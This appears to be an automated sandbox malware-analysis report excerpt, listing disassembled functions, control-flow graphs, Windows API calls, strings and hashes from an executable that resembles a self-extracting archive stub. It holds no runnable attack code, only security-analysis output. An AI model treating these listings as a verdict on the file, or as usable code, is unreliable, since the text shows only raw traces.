                                                                                            • Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                                                                          • _swprintf.LIBCMT ref: 0087F834
                                                                                          • _swprintf.LIBCMT ref: 0087F880
                                                                                            • Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E
                                                                                          • AllocConsole.KERNEL32 ref: 0087F888
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0087F892
                                                                                          • AttachConsole.KERNEL32(00000000), ref: 0087F899
                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0087F8BF
                                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 0087F8C6
                                                                                          • Sleep.KERNEL32(00002710), ref: 0087F8D1
                                                                                          • FreeConsole.KERNEL32 ref: 0087F8D7
                                                                                          • ExitProcess.KERNEL32 ref: 0087F8DF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                          • API String ID: 1201351596-3298887752
                                                                                          • Opcode ID: 607563b7495a00e563d0cd868cf78d09be7ab2f4c2d0b9bed12827bb84391124
                                                                                          • Instruction ID: 88612150b27f879f5077ca38e8366d0ff3096533b4d670c0980ef8dc4d07633d
                                                                                          • Opcode Fuzzy Hash: 607563b7495a00e563d0cd868cf78d09be7ab2f4c2d0b9bed12827bb84391124
                                                                                          • Instruction Fuzzy Hash: 66D16FB10083849AE720DFA18849B9FBAE8FB86344F50492DE398D6A51D7B4D50DCF67

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 404 88aa45-88aa5d call 88cdf0 call 88cec0 409 88aa63-88aa8d call 8896ec 404->409 410 88b645-88b652 404->410 409->410 413 88aa93-88aa98 409->413 414 88aa99-88aaa7 413->414 415 88aaa8-88aab8 call 8893ba 414->415 418 88aaba 415->418 419 88aabc-88aad1 call 880b12 418->419 422 88aade-88aae1 419->422 423 88aad3-88aad7 419->423 425 88b611-88b63c call 8896ec 422->425 426 88aae7 422->426 423->419 424 88aad9 423->424 424->425 425->414 437 88b642-88b644 425->437 428 88ad9b-88ad9d 426->428 429 88acdd-88acdf 426->429 430 88aaee-88aaf1 426->430 431 88ad7e-88ad80 426->431 428->425 435 88ada3-88adaa 428->435 429->425 436 88ace5-88acf1 429->436 430->425 434 88aaf7-88ab64 call 888b8e call 87b56e call 87a11c call 87a256 call 876fa3 call 87a1a9 430->434 431->425 432 88ad86-88ad96 SetWindowTextW 431->432 432->425 503 88acc9-88acd8 call 87a132 434->503 504 88ab6a-88ab70 434->504 435->425 439 88adb0-88adc9 435->439 440 88acf3-88ad04 call 894654 436->440 441 88ad05-88ad0a 436->441 437->410 443 88adcb 439->443 444 88add1-88addf call 8920b3 439->444 440->441 446 88ad0c-88ad12 441->446 447 88ad14-88ad1f call 889844 441->447 443->444 444->425 461 88ade5-88adee 444->461 451 88ad24-88ad26 446->451 447->451 453 88ad28-88ad2f call 8920b3 451->453 454 88ad31-88ad51 call 8920b3 call 8920de 451->454 453->454 478 88ad6a-88ad6c 454->478 479 88ad53-88ad5a 454->479 465 88adf0-88adf4 461->465 466 88ae17-88ae1a 461->466 465->466 471 88adf6-88adfe 465->471 467 88aeff-88af0d call 87f10e 466->467 468 88ae20-88ae23 466->468 489 88af0f-88af23 call 89031b 467->489 472 88ae30-88ae4b 468->472 473 88ae25-88ae2a 468->473 471->425 477 88ae04-88ae12 call 87f10e 471->477 492 88ae4d-88ae87 472->492 493 88ae95-88ae9c 472->493 473->467 473->472 477->489 478->425 488 88ad72-88ad79 call 8920ce 478->488 485 88ad5c-88ad5e 479->485 486 88ad61-88ad69 call 894654 479->486 485->486 486->478 488->425 505 88af30-88af83 call 87f10e call 889592 GetDlgItem SetWindowTextW SendMessageW call 8920e9 489->505 506 88af25-88af29 489->506 528 88ae89 492->528 529 88ae8b-88ae8d 492->529 500 88aeca-88aeed call 8920b3 * 2 493->500 501 88ae9e-88aeb6 call 8920b3 493->501 500->489 534 88aeef-88aefd call 87f0e6 500->534 501->500 515 88aeb8-88aec5 call 87f0e6 501->515 503->425 510 88ab77-88ab8c SetFileAttributesW 504->510 542 88af88-88af8c 505->542 506->505 511 88af2b-88af2d 506->511 516 88ac32-88ac3e GetFileAttributesW 510->516 517 88ab92-88abc5 call 87b100 call 87adf5 call 8920b3 510->517 511->505 515->500 525 88acae-88acc3 call 87a1a9 516->525 526 88ac40-88ac4f DeleteFileW 516->526 551 88abd8-88abe6 call 87b52e 517->551 552 88abc7-88abd6 call 8920b3 517->552 525->503 540 88ab72 525->540 526->525 533 88ac51-88ac54 526->533 528->529 529->493 538 88ac58-88ac84 call 873f5b GetFileAttributesW 533->538 534->489 549 88ac56-88ac57 538->549 550 88ac86-88ac9c MoveFileW 538->550 540->510 542->425 546 88af92-88afa4 SendMessageW 542->546 546->425 549->538 550->525 553 88ac9e-88aca8 MoveFileExW 550->553 551->503 558 88abec-88ac2b call 8920b3 call 88dea0 551->558 552->551 552->558 553->525 558->516
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0088AA4A
                                                                                            • Part of subcall function 008896EC: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 008897B4
                                                                                          • SetFileAttributesW.KERNEL32(?,00000005,?,?,?,00000800,?,?,00000000,00000001,0088A35D,?,00000000), ref: 0088AB7F
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 0088AC39
                                                                                          • DeleteFileW.KERNEL32(?), ref: 0088AC47
                                                                                          • SetWindowTextW.USER32(?,?), ref: 0088AD90
                                                                                          • _wcsrchr.LIBVCRUNTIME ref: 0088AF1A
                                                                                          • GetDlgItem.USER32(?,00000066), ref: 0088AF55
                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0088AF65
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,008B412A), ref: 0088AF79
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0088AFA2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesMessageSendTextWindow$DeleteEnvironmentExpandH_prologItemStrings_wcsrchr
                                                                                          • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                                          • API String ID: 3676479488-312220925
                                                                                          • Opcode ID: 9dff886a3c61d433ed9600e6a5d92c7d90ea90e02aa54e945f38dc525f6d44c2
                                                                                          • Instruction ID: c718ee65a4da757e39a1b4c14e9c16b1e4cf1fd828b34ab1211fedc022ecec5b
                                                                                          • Opcode Fuzzy Hash: 9dff886a3c61d433ed9600e6a5d92c7d90ea90e02aa54e945f38dc525f6d44c2
                                                                                          • Instruction Fuzzy Hash: 86E14B72900119AAEF24FBA4DD85EEE737CFB45350F1440A6F519E3181EB749B848F62

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 563 87ced7-87cf51 call 87c88e GetWindowRect GetClientRect 566 87cf57-87cf5f 563->566 567 87cff2-87cffa 563->567 568 87cf65-87cfae 566->568 569 87d034-87d04f GetSystemMetrics GetWindow 566->569 567->569 570 87cffc-87d02e GetWindowTextW call 87c91f SetWindowTextW 567->570 572 87cfb2-87cfb4 568->572 573 87cfb0 568->573 571 87d12d-87d12f 569->571 570->569 578 87d135-87d13f 571->578 579 87d054-87d05a 571->579 576 87cfb6 572->576 577 87cfb8-87cfee GetWindowLongW GetWindowRect 572->577 573->572 576->577 577->567 579->578 580 87d060-87d078 GetWindowTextW 579->580 581 87d09f-87d0a4 580->581 582 87d07a-87d099 call 87c91f SetWindowTextW 580->582 585 87d0a6-87d114 GetWindowRect 581->585 586 87d11b-87d12a GetWindow 581->586 582->581 585->586 586->578 588 87d12c 586->588 588->571
                                                                                          APIs
                                                                                            • Part of subcall function 0087C88E: _wcschr.LIBVCRUNTIME ref: 0087C8BD
                                                                                          • GetWindowRect.USER32(?,?), ref: 0087CF0E
                                                                                          • GetClientRect.USER32(?,?), ref: 0087CF1A
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 0087CFBB
                                                                                          • GetWindowRect.USER32(?,?), ref: 0087CFE8
                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0087D007
                                                                                          • SetWindowTextW.USER32(?,?), ref: 0087D02E
                                                                                          • GetSystemMetrics.USER32(00000008), ref: 0087D036
                                                                                          • GetWindow.USER32(?,00000005), ref: 0087D041
                                                                                          • GetWindowTextW.USER32(00000000,?,00000400), ref: 0087D06C
                                                                                          • SetWindowTextW.USER32(00000000,00000000), ref: 0087D099
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0087D0AC
                                                                                          • GetWindow.USER32(00000000,00000002), ref: 0087D11E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$RectText$ClientLongMetricsSystem_wcschr
                                                                                          • String ID: d
                                                                                          • API String ID: 4134264131-2564639436
                                                                                          • Opcode ID: 16cb1f373a69b9753f4be03abdf09fb95e24d93f5cd75dd4560494030f915430
                                                                                          • Instruction ID: 0bf6fbbe59dfb36d777174f9643e8b3738fea0a53cef8fdf0e5b61e9c3f5e7e8
                                                                                          • Opcode Fuzzy Hash: 16cb1f373a69b9753f4be03abdf09fb95e24d93f5cd75dd4560494030f915430
                                                                                          • Instruction Fuzzy Hash: 6A616E72208300AFD315DF69CD88E6BBBEAFB89714F44451DF684D2690D774E909CB62

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • GetDlgItem.USER32(00000068,008C8958), ref: 0088B71D
                                                                                          • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00889325), ref: 0088B748
                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088B757
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,008A02E4), ref: 0088B761
                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088B777
                                                                                          • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088B78D
                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088B7CD
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088B7D7
                                                                                          • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088B7E6
                                                                                          • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088B809
                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,008A1368), ref: 0088B814
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$ItemShowWindow
                                                                                          • String ID: \
                                                                                          • API String ID: 1207805008-2967466578
                                                                                          • Opcode ID: beddab3abb73c7fc25cc9441997ada7e25bc1cc47545a1c5ee1c99fba6c2596b
                                                                                          • Instruction ID: 3f858d3e6af98fa1d3bcc64d9830da70199bdebd6154fe8e51cb03d7e8a3deaf
                                                                                          • Opcode Fuzzy Hash: beddab3abb73c7fc25cc9441997ada7e25bc1cc47545a1c5ee1c99fba6c2596b
                                                                                          • Instruction Fuzzy Hash: 9721D0712857447BE311BB249C45FAB7B9CFF82754F000618FAA0E61D0D7A55A098BA7

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 621 88b9aa-88b9c2 call 88cec0 624 88b9c8-88b9d4 call 8920b3 621->624 625 88bc0e-88bc16 621->625 624->625 628 88b9da-88ba02 call 88dea0 624->628 631 88ba0c-88ba19 628->631 632 88ba04 628->632 633 88ba1b 631->633 634 88ba1d-88ba26 631->634 632->631 633->634 635 88ba28-88ba2a 634->635 636 88ba5e 634->636 637 88ba32-88ba35 635->637 638 88ba62-88ba64 636->638 639 88ba3b-88ba43 637->639 640 88bbc2-88bbc7 637->640 641 88ba6b-88ba6d 638->641 642 88ba66-88ba69 638->642 643 88ba49-88ba4f 639->643 644 88bbdb-88bbe3 639->644 645 88bbc9 640->645 646 88bbbc-88bbc0 640->646 647 88ba80-88ba92 call 87b09c 641->647 648 88ba6f-88ba76 641->648 642->641 642->647 643->644 650 88ba55-88ba5c 643->650 652 88bbeb-88bbf3 644->652 653 88bbe5-88bbe7 644->653 651 88bbce-88bbd2 645->651 646->640 646->651 656 88baab-88bab6 call 879dff 647->656 657 88ba94-88baa1 call 880b12 647->657 648->647 654 88ba78 648->654 650->636 650->637 651->644 652->638 653->652 654->647 663 88bab8-88bacf call 87ae20 656->663 664 88bad3-88bae0 ShellExecuteExW 656->664 657->656 662 88baa3 657->662 662->656 663->664 666 88bc0c-88bc0d 664->666 667 88bae6-88baf9 664->667 666->625 669 88bafb-88bb02 667->669 670 88bb0c-88bb0e 667->670 669->670 671 88bb04-88bb0a 669->671 672 88bb10-88bb19 670->672 673 88bb21-88bb40 call 88be69 670->673 671->670 674 88bb77-88bb83 CloseHandle 671->674 672->673 682 88bb1b-88bb1f ShowWindow 672->682 673->674 691 88bb42-88bb4a 673->691 675 88bb94-88bba2 674->675 676 88bb85-88bb92 call 880b12 674->676 680 88bbff-88bc01 675->680 681 88bba4-88bba6 675->681 676->675 688 88bbf8 676->688 680->666 685 88bc03-88bc05 680->685 681->680 686 88bba8-88bbae 681->686 682->673 685->666 689 88bc07-88bc0a ShowWindow 685->689 686->680 690 88bbb0-88bbba 686->690 688->680 689->666 690->680 691->674 692 88bb4c-88bb5d GetExitCodeProcess 691->692 692->674 693 88bb5f-88bb69 692->693 694 88bb6b 693->694 695 88bb70 693->695 694->695 695->674
                                                                                          APIs
                                                                                          • ShellExecuteExW.SHELL32(000001C0), ref: 0088BAD8
                                                                                          • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0088BB1D
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 0088BB55
                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088BB7B
                                                                                          • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0088BC0A
                                                                                            • Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
                                                                                          • String ID: $.exe$.inf
                                                                                          • API String ID: 3686203788-2452507128
                                                                                          • Opcode ID: 30a631c03982e4afa78e2d5bbec2a58ee1079a94b7a83c39badb4a78e5ab5485
                                                                                          • Instruction ID: e033b91001b29f34f644b0022d5865810454a0f736ffcd78ee616e8faed16bf3
                                                                                          • Opcode Fuzzy Hash: 30a631c03982e4afa78e2d5bbec2a58ee1079a94b7a83c39badb4a78e5ab5485
                                                                                          • Instruction Fuzzy Hash: 4D51CD3050A7909AEB31BF64D940ABBBBE9FFC5314F04081DE4C1D32A5EBB19949CB52

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 696 87cacc-87cb00 call 88cdf0 call 88cec0 call 890138 703 87cb33-87cb3c call 87f10e 696->703 704 87cb02-87cb31 GetModuleFileNameW call 87b88c call 87f0e6 696->704 708 87cb41-87cb65 call 879401 call 87973d 703->708 704->708 715 87cb6b-87cb74 708->715 716 87cdb8-87cdd3 call 879437 708->716 718 87cb77-87cb7a 715->718 720 87cb80-87cb86 call 879aeb 718->720 721 87cca8-87ccc8 call 8799e0 call 8920d3 718->721 725 87cb8b-87cbb2 call 87990d 720->725 721->716 730 87ccce-87cce7 call 87990d 721->730 731 87cc71-87cc74 725->731 732 87cbb8-87cbc0 725->732 744 87ccf0-87cd02 call 8920d3 730->744 745 87cce9-87ccee 730->745 736 87cc77-87cc99 call 8799e0 731->736 734 87cbc2-87cbca 732->734 735 87cbeb-87cbf6 732->735 734->735 738 87cbcc-87cbe6 call 893660 734->738 739 87cc21-87cc29 735->739 740 87cbf8-87cc04 735->740 736->718 755 87cc9f-87cca2 736->755 760 87cc67-87cc6f 738->760 761 87cbe8 738->761 742 87cc55-87cc59 739->742 743 87cc2b-87cc33 739->743 740->739 747 87cc06-87cc0b 740->747 742->731 750 87cc5b-87cc5e 742->750 743->742 749 87cc35-87cc4f call 893660 743->749 744->716 766 87cd08-87cd25 call 8806e9 call 8920ce 744->766 751 87cd27-87cd2f 745->751 747->739 754 87cc0d-87cc1f call 893589 747->754 749->716 749->742 750->732 756 87cd34-87cd41 751->756 757 87cd31 751->757 754->739 768 87cc63 754->768 755->716 755->721 763 87cd43-87cd45 756->763 764 87cdad-87cdb5 756->764 757->756 760->736 761->735 769 87cd46-87cd50 763->769 764->716 766->751 768->760 769->764 771 87cd52-87cd56 769->771 773 87cd90-87cd93 771->773 774 87cd58-87cd5f 771->774 776 87cd95-87cd9b 773->776 777 87cd9d-87cd9f 773->777 778 87cd86 774->778 779 87cd61-87cd64 774->779 776->777 781 87cda0 776->781 777->781 784 87cd88-87cd8e 778->784 782 87cd66-87cd69 779->782 783 87cd82-87cd84 779->783 785 87cda4-87cdab 781->785 786 87cd7e-87cd80 782->786 787 87cd6b-87cd6e 782->787 783->784 784->785 785->764 785->769 786->784 788 87cd70-87cd74 787->788 789 87cd7a-87cd7c 787->789 788->781 790 87cd76-87cd78 788->790 789->784 790->784
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 0087CAD1
                                                                                          • _wcschr.LIBVCRUNTIME ref: 0087CAEF
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0087CAB3,?), ref: 0087CB0A
                                                                                            • Part of subcall function 008806E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087B25B,00000000,?,?,?,?), ref: 00880705
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
                                                                                          • String ID: *messages***$*messages***$R$a
                                                                                          • API String ID: 803915177-2900423073
                                                                                          • Opcode ID: 2bb255bb5727d66ddf919c86bf6ee2ade0e38fdc7c62de203c04d8270622a56e
                                                                                          • Instruction ID: 8bfe9a4a7a2fd1a22093de5237e4aee947e38a9bf54680d575403a979109bc21
                                                                                          • Opcode Fuzzy Hash: 2bb255bb5727d66ddf919c86bf6ee2ade0e38fdc7c62de203c04d8270622a56e
                                                                                          • Instruction Fuzzy Hash: 459123B1A002089ADB30EF68CC85BAEBBA4FF54314F14C56EE65DE7295DB70D984CB50

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 791 8973ae-8973c7 792 8973c9-8973d9 call 89b9bc 791->792 793 8973dd-8973e2 791->793 792->793 803 8973db 792->803 795 8973ef-897413 MultiByteToWideChar 793->795 796 8973e4-8973ec 793->796 797 897419-897425 795->797 798 8975a6-8975b9 call 88d783 795->798 796->795 800 897479 797->800 801 897427-897438 797->801 807 89747b-89747d 800->807 804 89743a-897449 call 89f160 801->804 805 897457-897468 call 8959fc 801->805 803->793 810 89759b 804->810 817 89744f-897455 804->817 805->810 818 89746e 805->818 807->810 811 897483-897496 MultiByteToWideChar 807->811 815 89759d-8975a4 call 897616 810->815 811->810 814 89749c-8974ae call 897a09 811->814 820 8974b3-8974b7 814->820 815->798 822 897474-897477 817->822 818->822 820->810 823 8974bd-8974c4 820->823 822->807 824 8974fe-89750a 823->824 825 8974c6-8974cb 823->825 827 89750c-89751d 824->827 828 897556 824->828 825->815 826 8974d1-8974d3 825->826 826->810 829 8974d9-8974f3 call 897a09 826->829 831 897538-897549 call 8959fc 827->831 832 89751f-89752e call 89f160 827->832 830 897558-89755a 828->830 829->815 844 8974f9 829->844 834 89755c-897575 call 897a09 830->834 835 897594-89759a call 897616 830->835 831->835 843 89754b 831->843 832->835 847 897530-897536 832->847 834->835 849 897577-89757e 834->849 835->810 848 897551-897554 843->848 844->810 847->848 848->830 850 8975ba-8975c0 849->850 851 897580-897581 849->851 852 897582-897592 WideCharToMultiByte 850->852 851->852 852->835 853 8975c2-8975c9 call 897616 852->853 853->815
                                                                                          APIs
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00892FC2,00892FC2,?,?,?,008975FF,00000001,00000001,F5E85006), ref: 00897408
                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008975FF,00000001,00000001,F5E85006,?,?,?), ref: 0089748E
                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00897588
                                                                                          • __freea.LIBCMT ref: 00897595
                                                                                            • Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E
                                                                                          • __freea.LIBCMT ref: 0089759E
                                                                                          • __freea.LIBCMT ref: 008975C3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1414292761-0
                                                                                          • Opcode ID: 66423152b8d7c799828102c124c8ee84b62dbf698b57a5e2d258843bc5919bb5
                                                                                          • Instruction ID: 3dce29735da8719ca41b1f96b6ca1fe313daa27580e9b1f0458f6f0c725d4712
                                                                                          • Opcode Fuzzy Hash: 66423152b8d7c799828102c124c8ee84b62dbf698b57a5e2d258843bc5919bb5
                                                                                          • Instruction Fuzzy Hash: BE51C172624216AFEF25AF68CC41EBF7BA9FB44750F5A4629FC05D6150EB34DC40C6A0

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                            • Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
                                                                                            • Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346
                                                                                          • OleInitialize.OLE32(00000000), ref: 0088904F
                                                                                          • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00889086
                                                                                          • SHGetMalloc.SHELL32(008B20E8), ref: 00889090
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1683112109.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1683058458.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683406485.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683433753.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1683482554.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_870000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
                                                                                          • String ID: riched20.dll$3Ro
                                                                                          • API String ID: 3498096277-3613677438
